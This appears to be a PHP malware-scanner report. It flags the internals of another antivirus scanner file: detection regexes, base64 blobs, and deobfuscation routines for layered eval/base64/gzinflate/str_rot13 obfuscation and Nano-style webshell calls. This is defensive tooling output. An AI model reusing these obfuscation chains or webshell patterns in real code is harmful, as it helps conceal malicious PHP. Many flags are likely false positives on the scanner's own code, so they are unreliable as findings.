| Sign 11413268 Line: 1 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode(
| Sign 301ca578 Line: 1 Dangerous Malware Signature (hash: 301ca578) |
tmhapbzcerff
| Sign 34b7e999 Line: 1 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
| Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f) |
etalfnizg
| Sign 4a069524 Line: 1 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) |
n0cl
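| Sign 963e968a Line: 1 Dangerous Malware Signature (hash: 963e968a); this id matches `PHPJiaMi` here and `php_uname()` in the other files of this report, so the hash appears to name a detection rule with several alternative strings, not a file hash |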
PHPJiaMi
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454) |
VjaG
| Sign f9dc0a55 Line: 1 Dangerous Malware Signature (hash: f9dc0a55) |
'' . base64_decode
|
|
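//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/tools/ai-bolit.php Size: 1.79 MB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 20 Dangers: 81
Note: the path (`revisium_antivirus/.../ai-bolit.php`) and the matched excerpts below (regex signature entries such as `'full' => '~...~'`, `deobfuscate*` helper methods, scanner command-line help text) indicate that this file is itself a malware scanner. Most matches in this section are therefore likely its own detection patterns and decoding routines rather than signs of compromise. The same probably holds for `ai-bolit-hoster.php` in the same directory. Confirm by comparing each file's checksum with the vendor's distributed copy before treating these entries as findings.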
| Description | Match |
|---|
Exploit base64_long Line: 2079 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"jXwLQ9rKE+9X2XJSCRUCITxVVARUWhQOoLZV/5yQBEgJCU2CgH3cr35nZnfR9jzu7Tlqsq9sZufxm5ndmAeFgn7wzT3IHUYHevEgsS54xsfnTwa7Ml3PCROH7oGOVbmDRCOwHXs03o5usTQPpQZ0WARPzmi19AITayfQSVVG5+1Oa3B/9PXr8bnuGdjcwEGMg8TZ9ijSjz9sF50v/hwrCr9UDGaFjssrilhRkhV1P/BxAmGEdSWoK0CdsoqcsD51/DhiNWaGoblVExdBMPWcRJolBt4qXOLF1eD6LIixZxl6Qsd7IzT9RyyoiLdrmmt/ZPpTx8PSKpRWDhJ9ozm8+dgaEBmQRHlo+eRGbhyEw9C05k44cqOrYEwNkFD5wkHCChYjK/BjmFbWDGPX8hxbW86W1AjpppcPEkexG3vOcWsR9cJgs2VPVCvJZPp2GLh2xp2GZoZqCmKBarXawcHBwrThN1xTHZIKqi4Lmy5fsZKYfmEJZTl...
| Exploit base64_long Line: 2080 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"bVVrb9s2FP0rrJbODhDHkinFttIUS+202dI8ELtdiyAQaImWCVGPkpQTu9h++y4fdoJin2IdHh7ee+4jJD7x458s9k9lPIy9jC5JSoV3yuIAkEEYe9/rFqWkQk2rEEFlFiGpBKtyzRkAZxR7zaqRK8q5hjBAJ4PYe5exNUo5kfLMW/A6LdBCbRoaeO9fn2Sqbn5BFqr03mul0Iqn4/FePLKQiIZ76MQGfjOfkizbaGTo7rHVnjSypI/PRkwjY0ACCPNvukAzTUMLcznQRgSBdmLN+Ha2UwiMHVHsXZK0oBmw0TlfkgVV9VcmVEssyxlyg9X+7QA7xZmqRTl8UQwd/rlOW/kKj1xouyyPwV5zoFMdxx6pFHtRHzqVcmMw+kxTg49sJDa328JgJmkoqSZ1PVGinkC9pSmkSVtHTlGbEV5LtCW5aLdMmWOdfQSvHJRUSpJTdIaooHkiaMOhYbre22jydjDwjpBn/+yIh6fmvvYlgNgb6By...
| Exploit base64_long Line: 2084 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"rRlrc9vGMX0kTafNH+iXwjQdSDEpESBBUlSojCzRthw9HErKhwoq5gicyKvwKg4QqTqeaZv2QyfTX9CZdvpPu7t3IKmHYzup7SGJxe7e7fth1rPa3d4r0Wtsyl673atk/I+FyLgrP3NXvsDPqnc8GH49GLpn8HRmVs5fNWrW692jndODweGJNzw6OplDEf+8sil6FnDrWHNuXhL7P5alrS8oYj8sgh/LrakvqLn9Py7YwgveZrmyxMu8wcB0z901c30k8kzM1qMkKEIu15GRA4ycjYUplnlUbvCoII9KyWPCWcAzdy2dpMim/QPZXCRJvsSmA2yanV6F+5PEqHwu/Uyk+ZbBQp7l7opZcdfcajCqb415PsiQoAsErcb3E4C4PFyi2QCabq8iE0RxV8mF0CMt4BMVMq9n/IqFBEbXQj8Vcwh6BsgZJMUonAPRwBZc263KiGX5dX3Lw3fuCr1FWzWBd5rx1JWPswg+6tkFfD56NSpEGGS...
| Exploit base64_long Line: 2085 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"rVmLe9o4Ev9XsvnSXhJqwLxJS3NpQttsSdIFso+Le/6ELUDF2F7LTqDx/u83M5KNyWO3e3dfW2pLmpE885un2JHZqh7di6Pqa3lUax7tSk/4C2mVZVKZ8djWb+E83H0tjkxYZNaPdi8GtucELs8napuJF1sTdZzoHu3iIPBZMuEjS6scJTjd0NM2bTTl3LWjYBLE0rZxuqnZDs4vP73v98/s61F/iBMtnGjAhKY69QT3Y5xp40wHOUoWctvlnliKmEeKYQe/EvZzhQy5L3lklVkUC8fDwyFBdrAusjFhg/7lJ9vJuZtVPT46+dwvjpNkWlsfwn1XbWrW9ORocKI325zXRAnVqke7Pr+zZGkwuNBsrX3rgBaQjNpw5olVjqNExkUBmiiiFojI2rNBNj/3h9aNJQ9v/rH75eN4/Nke9t/3h/0hvsOwhT+v9PxjXijVRg153TDj24nxr6rRtb+UYH0P/tEBD9+N8GCv4Yk784DIUOR1OKD...
| Exploit base64_long Line: 2086 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"jVhtc9pGEP4rVONxE1NjJCRe5JAMxiRlAoYCcceNOswhHXAToVMlAXHq/vfu7p14bdp+sCxr9/b2nt19ds/MNct190/hlm9T16y5xrjd6ntpcdh6GrZ68LIxboVrotB0jfbjo+ulV96FT58t/FxxjW60YaEIQHvy+ICCitbXgsJIfbbhs112jYDP2TrMxhnL1inYa8LP5x+N37tRxpOIZ4U7Fn0R0QLXOLDGqrvGm0xkIX8Lmm0Wi4z7sFuuj3pV1Ksd6sHmPFWKgygUEUe1GqhVGq4h9FI8avcBntF6NeMJvAjwqJjwP9Yi4QEuqevDaMtjlqT4uaEP/2aWvG1N+soQgUVQgsttGc1FsmKZkBE6MRmSGMG0nENPW7OUnRzHRGwt2PUa5EP2PGQhvLy5UWtIg0BuHNoBPXqGJEe0LUtbSMQG/Dg14ZyZ+BSJNpxbKCeqWo7xAAflHB6tFU+Ez0he00dphWLGZuwymqXxbZ9F6znzs3X...
| Exploit base64_long Line: 2087 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"7b0Je9vWtSj6V2wltgiRIomBkyiKcRznNL0ZeuykOa0gqyAJibApgiGoyYLeb39r2gNASHaGpud996U1hWFjj2uvea0dHXR87+AuOWgPswPX9Q92DqNwXp+v47NwvjeCf2E4Pt7dOZlvNqtsfNBqHb9twe1duzEY3IfX7+J1Ft9mx2/xmdsI2vdSHr48Og6vw7l6PJGiY3nabrid+8NWdLQzTA5caN3re9B6LTlbRxexA52ojQ/Ca/ga2uGuUL3XXJ+04Yyz9dR6jd08gGvs5+5OaxiOsX3oakt9GDah3tV8lU/PEwf6CsW4kKn00xrGUlQ229wu4vw6mW3m+TxOzucbx/6OysySbLWIbuEGP1qmy5g/HzpjKZcft13vRG4cBxrzsfkj+HfYCl2aJg8XKQhgmrLpOlltwqy+uV3FYQatZfThJr7ZtN5FVxEXoA5kezhHUmZn9wRaltV0xq3WJNmEzcVt6zicRfsfTu6Chuvdy3dH8O+...
| Exploit base64_long Line: 2088 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"nViNc9rKEf9XbKZxwYCEAAEWlv0SN29e3ry0M0k606nPzZzRCZQISZUOYx7wv3d3706ID3uSjhOE7nb39nZ/+wX3Ro63jrzOuPBGfa92XUzyKJOsaMY8mS74VPi/8yf+2awW+cS/5+0/37b/3WlffX1o2ntvLGgyK5tlrLi8ubaVrJvaOPIckN8febUgnSzmIpHMWuaRFEDH6vCxSEQx4Zl6v/9r7WHdaTnbN70J8naBd3BV5Z0K+T4W+L14t/rCp3/nc6H4ZoIH+GQNdt9hD8ziWSaS4G4WxQGrc9ZAgT0Q2AVloozVZ2ki2CYNgGET5VHBNt+jJIgF0vW10sWc5zJTlI8xn3x/FHm+Ypu5/A4LPOBsswSmdFmcERXyusDb63i1STrPeMw2IuYR8ociScSEbWZgmTRDygFq0/VqL1MMkQIMwOrhIpnIKE3gKq1H1lhHIavb8JIEORKOUGEgjMIcLWIVchXDYxkFcgam9eF/adxO9lx...
| Exploit base64_long Line: 2092 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo1OntzOjEwOiJ3aXphcmQucGhwIjtzOjM3OiJjbGFzcyBXZWxjb21lU3RlcCBleHRlbmRzIENXaXphcmRTdGVwIjtzOjE3OiJ1cGRhdGVfY2xpZW50LnBocCI7czozNzoieyBDVXBkYXRlQ2xpZW50OjpBZGRNZXNzYWdlMkxvZygiZXhlYyI7czoxMToiaW5jbHVkZS5waHAiO3M6NDg6IkdMT0JBTFNbIlVTRVIiXS0+SXNBdXRob3JpemVkKCkgJiYgJGFyQXV0aFJlc3VsdCI7czo5OiJzdGFydC5waHAiO3M6NjA6IkJYX1JPT1QuJy9tb2R1bGVzL21haW4vY2xhc3Nlcy9nZW5lcmFsL3VwZGF0ZV9kYl91cGRhdGVyLnBocCI7czoxMDoiaGVscGVyLnBocCI7czo1ODoiSlBsdWdpbkhlbHBlcjo6Z2V0UGx1Z2luKCJzeXN0ZW0iLCJvbmVjbGlja2NoZWNrb3V0X3Z...
| Exploit base64_long Line: 8766 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7Z0JYBTV/cfn2myWJLvJZsMVxCCgeADe9UAlhABRSEII3gq21Wq1ak+tokFttbRUQfBWRFvrXa21VWsLWK1HT3vaVlvofQtFFAST/N+bmd1989mZ2RxLwr/s4Pr2s9957/femzdv3kx2f7/XX3/9dU2zIq0TDE1bbGpyq4z/+h4ts+m6eDnvxKtOS1PultYfaXW4Dpp8/UTCO5o2da7z+eLTvWVY4iVr0a1si0TVxH/alGlCn+q8l/tEYEO+f7zV0biZSrlD3M/k+3Q+qdW9nW1bOpX9Yqn7uPnKXPvj3X33dvffW8kvX4abpu1bCvttMv9kfDZfvKaWecuUdZBlVM4NKMhnk/nWvd3z/eVW46b7uOmBbjpK2adOvPbqY37ZDjV/+pikKzzV6F19/bbZoowhCss+fE5zjl+agzZLeV0sXuvE63F8Hra1uuU/4hrJNMd9E02kt3ip2Mrl7qVWaWa3k938LwTkj0SdLVIit2hUtwxL3Ra...
| Exploit base64_long Line: 8768 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZrLUhpBFIZ7huEyiiJe8IIoKt7wMm1VllYFNqkskpSLPIDvkY3LLF1mmefIiqos8hAs8hDZYMlAuofu6e4fUQgaielf29Nfn+5zpmemAM/QbDabhHjJixNCyFWCcN3++PyNKDnRL5F/lUXx8TJr2cUelwfMIbuKa4umv8vkCiv5lWvm1I9Dz3FXPilXNBmXaP2y8H2p9O8xOi9abD1HQjQ+1xNj0jqiuZDfhXEUX5+EsYTWl3H1fQwrvq5RGW3NvrBU2HXNV2Zt+65FsLmrPCF57QpmidrHlGiDVK7HKk8EuwkvmUpn/Kni3Tzq+ufez6TzQ+fbsmXLli2/DH7u9xvLli1btmzZ8rNzLU/I5RwbZ5aylq3X04OKJ3Wtz+fWwY/LEsAeMNZhUsBp4AywD8zrHHwfUkXWHDiwGcwplU6zlvIc4nENKh/1SZbXRq3jHAnb6fY0bD5UVlhZ/cH9aS5xGpyh9/YU8VA51q5zvXshul/YRW3...
| Exploit base64_long Line: 8770 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZtNk9REGMefZF72jd0MD6ALC7sDgryIAr6iogwKCIgUBw8cPGCVJ7+CB+cjcPDgkYMHLlbxDdwqrdKjR6v24FegysuyLDumJ88/yfN0ZmZnRmpgzW+rt///7qQ76STdPZ2ZtbW1NaJqjS4RUbtCjjs3l5kUQfp/X+qKaRodmO2PumrOZr69ovfvxNQlhj8a6jKcjpOoInWsL2f1Ta8keZa6BJRLOd2U8v46k+27gI0u6fPKn18tDgfkeJYkDXEo6RWJq7kAX8SSqYOkjDyBHLuLr5n264crp3V2+9s7jkuMYzpStFFRg+do1bSfj8MiZefV734KwJQj8JgKqkG8UbVST3wtJZhONwr1PsYOzp8gM9K8D8IkfijPwm1pvK8qyX29WknSW9XkMcZz91NYcHkacl3i0I6BdvfUz3Heqmx2Y47o+4jomLl+oHsIwYCLvwO4G4ev4/BNHO45Hzfs3bidv52N44bcv/1u4jGY91ICV1WQ98P...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTY1OntzOjM6IuKAqCI7czoxOiIgIjtzOjM6IuKAqSI7czoxOiIgIjtzOjM6IuGagCI7czoxOiIgIjtzOjM6IuKAgCI7czoxOiIgIjtzOjM6IuKAgSI7czoxOiIgIjtzOjM6IuKAgiI7czoxOiIgIjtzOjM6IuKAgyI7czoxOiIgIjtzOjM6IuKAhCI7czoxOiIgIjtzOjM6IuKAhSI7czoxOiIgIjtzOjM6IuKAhiI7czoxOiIgIjtzOjM6IuKAiCI7czoxOiIgIjtzOjM6IuKAiSI7czoxOiIgIjtzOjM6IuKAiiI7czoxOiIgIjtzOjM6IuKBnyI7czoxOiIgIjtzOjI6IsKgIjtzOjE6IiAiO3M6Mzoi4oCHIjtzOjE6IiAiO3M6Mzoi4oCvIjtzOjE6IiAiO3M6Mjoiw4IiO3M6MToiICI7czoyOiLfuiI7czoxOiJfIjtzOjM6Iu+5jSI7czoxOiJfIjtzOjM6Iu+5jiI...
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code |
$JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[13] . $JYekrRTYM[21] . $JYekrRTYM[4] . $JYekrRTYM[17] . $JYekrRTYM[19] . $JYekrRTYM[26] . $JYekrRTYM[20] . $JYekrRTYM[20] . $JYekrRTYM[3] . $JYekrRTYM[4] . $JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[3] . $JYekrRTYM[4]; return Helpers::convertToSafeFunc($jPnPLPZcMHgH) ? $jPnPLPZcMHgH($sBtUiFZaz) : ''; }
| Exploit download_remote_code2 Line: 16282 Dangerous RFU (Remote File Upload) via HTTP allows malicious code to be written to the target machine |
fwriteB64DecodedStr', ], [ 'full' => '~file_put_contents\(\$_SERVER\[\'[^\']+\'\]\.\'[^\']+\',base64_decode\(\'[^\']+\'\)
| Exploit eval_base64 Line: 16766 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(')
| Exploit eval_base64 Line: 16808 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(\')
| Exploit eval_base64 Line: 17160 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(' . $matches[3] . ')
| Exploit eval_base64 Line: 22248 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit eval_base64 Line: 22604 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit eval_preg Line: 22504 Dangerous RCE (Remote Code Execution) through PCRE (Perl Compatible Regular Expressions) allows remote attackers to execute arbitrary commands or code on the target machine |
preg_replace("/' . $matches[2] . '/e",\'\'', '\'\',"' . $matches[2] . '")
| Exploit execution Line: 1665 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(strrev(trim(file_get_contents($avdb_file)
| Exploit execution Line: 16766 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(')
| Exploit execution Line: 16808 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(\')
| Exploit execution Line: 17160 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(' . $matches[3] . ')
| Exploit execution Line: 17397 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($layer2)
| Exploit execution Line: 17506 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($match[2])
| Exploit execution Line: 17510 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[2])
| Exploit execution Line: 17575 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode(str_rot13($matches[3])
| Exploit execution Line: 18256 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(strrev($matches[12])
| Exploit execution Line: 18691 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($matches[4])
| Exploit execution Line: 18758 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($matches[4])
| Exploit execution Line: 19362 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(end($array)
| Exploit execution Line: 19370 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(Helpers::getEvalCode($phpcode)
| Exploit execution Line: 19484 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode(str_rot13($str_to_concat)
| Exploit execution Line: 20037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($result)
| Exploit execution Line: 20660 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[1])
| Exploit execution Line: 20757 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($encodedStr)
| Exploit execution Line: 21953 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode')
| Exploit execution Line: 21957 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(base64_decode')
| Exploit execution Line: 22037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(str_rot13(base64_decode(' . $matches[2] . ')
| Exploit execution Line: 22092 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($matches[1])
| Exploit execution Line: 22154 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[2])
| Exploit execution Line: 22155 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[4])
| Exploit execution Line: 22158 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($decoded)
| Exploit execution Line: 22248 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit execution Line: 22249 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[11])
| Exploit execution Line: 22261 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[4])
| Exploit execution Line: 22323 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[2])
| Exploit execution Line: 22377 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(implode('', $array)
| Exploit execution Line: 22487 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(str_rot13(gzinflate(str_rot13(gzinflate(base64_decode(')
| Exploit execution Line: 22604 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit hex_char Line: 15511 Dangerous Hex char is usually used for the obfuscation of malicious code |
\x5f
| Exploit ioncube_loader Line: 15345 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
IonCube_loader
| Exploit md5_create_function Dangerous The `create_function` technique is usually used for the obfuscation of malicious code |
$md5 = md5($res); $res = base64_decode(str_replace($md5, '', strtr($matches[5], $matches[6], $matches[7]))); if (preg_match('~eval\((?:\$[^(]{0,50}\(){2}\$[^,]{0,50},\s{0,10}\'([^\']{1,500})\',\s{0,10}\'([^\']{1,500})\'\){3};~msi', $res, $match)) { $res = Helpers::replaceVarsFromArray($vars, $res); if (preg_match('~eval\(base64_decode\(strtr\(~msi', $res)) { $res = base64_decode(strtr($arr1, $match[1], $match[2])); } } } return $res; } private function deobfuscateEvalArrayVar($str, $matches) { $...
| Exploit nano Line: 12287 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1](explode(',', $expr_arr[2])
| Exploit nano Line: 12293 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]((int)
| Exploit nano Line: 12296 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]($expr_arr[2])
| Exploit nano Line: 14123 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[1](@$args[2]($args[3])
| Exploit nano Line: 14145 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[0](@$args[1]($args[2])
| Exploit nano Line: 14193 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$params[$i]($params[0])
| Exploit nano Line: 14876 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1)
| Exploit nano Line: 14894 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1, $val2)
| Exploit nano Line: 15014 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$function_otions['func'](...$params_array)
| Exploit nano Line: 16794 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$_[GPRC](?:OST|ET|EQUEST|OOKIE)
| Exploit nano Line: 19821 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$match[2]($str[$dictionaryName], $match[4])
| Exploit nano Line: 20382 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$matches[4]($matches[6])
| Exploit nano Line: 22583 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$m[1]($m[2])
| Exploit nano Line: 23614 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$config[$class](...$constructorArgs)
| Exploit reversed Line: 16033 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions |
ecalper_rts
| Exploit silenced_eval Line: 17499 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine |
@eval((?:\(\$[0O]+\[[\'"]\w+[\'"]\])
| Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(', 'eval(', $string); $string = str_replace('@@slaquote@@', '\\\'', $string); $string = str_replace('@@sladquote@@', '\\"', $string); $string = str_replace("eval(''.", 'eval(', $string); $res = str_replace($find, $string, $str); if (strpos($string, 'gzinflate(\'') !== false) { $res = $this->deobfuscateEval(stripcslashes($res), []); } return $res; } private function deobfuscateEval($str, $matches) { if (preg_match('~\)+\..{0,30}base64_decode~msi', $str)) { $res = explode(').', $str); $res ...
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function(\'', $cr_func, 2)); $func = implode(') {', explode('\',\'', $func, 2)); $func = substr($func, 0, -2) . '}'; $str = str_replace($cr_func, $func, $str); } return $str; } public static function calc($expr) { if (is_array($expr)) { $expr = $expr[0]; } $expr = str_replace([' ', "\r", "\n", "\t"], '', $expr); preg_match('~(chr|min|max|round)?\(([^\)]+)\)~msi', $expr, $expr_arr); if (@$expr_arr[1] == 'min' || @$expr_arr[1] == 'max') { return $expr_arr[1](explode(',', $expr_arr[2])); } e...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(?&c)\()?(?&c)rawurldecode(?&c)\((?&c)\3(?&c)\)(?&c)\s*\^\s*substr(?&c)\((?&c)str_repeat(?&c)\((?&c)\2,\s*(?&c)\((?&c)strlen(?&c)\((?&c)\3(?&c)\)(?&c)/strlen(?&c)\((?&c)\2(?&c)\)(?&c)\)(?&c)\s*\+\s*1(?&c)\)(?&c),\s*0,(?&c)\s*strlen(?&c)\((?&c)\3(?&c)\)(?&c)\)(?&c)\)(?:(?&c)\s*\.\s*\'{\'(?&c)\))?(?&c);~msi', 'id' => 'xorFName', ], [ 'full' => '~(\$\w{1,40})=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'([^\']+)\'\);eval\(\1\(gzuncompress\(\2\(\3\)\)\...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
